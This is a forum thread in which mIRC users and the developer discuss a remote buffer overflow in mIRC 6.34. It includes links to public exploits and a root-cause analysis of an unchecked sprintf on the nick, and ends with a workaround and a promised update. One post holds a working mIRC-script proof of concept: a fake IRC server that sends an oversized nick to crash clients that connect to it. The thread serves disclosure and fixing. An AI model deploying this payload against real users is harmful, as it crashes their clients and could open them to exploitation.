mIRC Homepage

Mirc 6.34 Remote Buffer Overflow

Posted By: emm1

Mirc 6.34 Remote Buffer Overflow - 03/10/08 08:38 AM

Hello, I was just notified of this bug here. Hopefully someone can address it quickly.

http://www.milw0rm.com/exploits/6654
Posted By: Collective

Re: Mirc 6.34 Remote Buffer Overflow - 03/10/08 11:05 AM

Confirmed, crashes a clean mIRC 6.34.
Posted By: Khaled

Re: Mirc 6.34 Remote Buffer Overflow - 03/10/08 11:36 AM

This is a server-based expoit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.

That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.

When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.

When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.

I'll continue to try to reproduce this issue and if verified I should have an update out shortly.
Posted By: Pivo

Re: Mirc 6.34 Remote Buffer Overflow - 04/10/08 12:53 PM

That Perl Script is crashing both my modified and my clean installation of mIRC.
Screenshot
Windows XP Service Pack 3, mIRC 6.34, ...

Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
Code:
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }

  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }

  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type 04/server localhost %p $+  to crash mirc.
}

on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}
Posted By: DONGS

Re: Mirc 6.34 Remote Buffer Overflow - 05/10/08 12:58 AM

http://www.milw0rm.com/exploits/6666

Can you fix it now?
Posted By: Sat

Re: Mirc 6.34 Remote Buffer Overflow - 05/10/08 10:24 AM

The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.

Temporary workaround until the new mIRC is out:
Code:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt

Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.
Posted By: Khaled

Re: Mirc 6.34 Remote Buffer Overflow - 07/10/08 05:15 PM

Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.
Posted By: Trashlord_

Re: Mirc 6.34 Remote Buffer Overflow - 07/10/08 09:59 PM

Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.
© 2022 mIRC Discussion Forums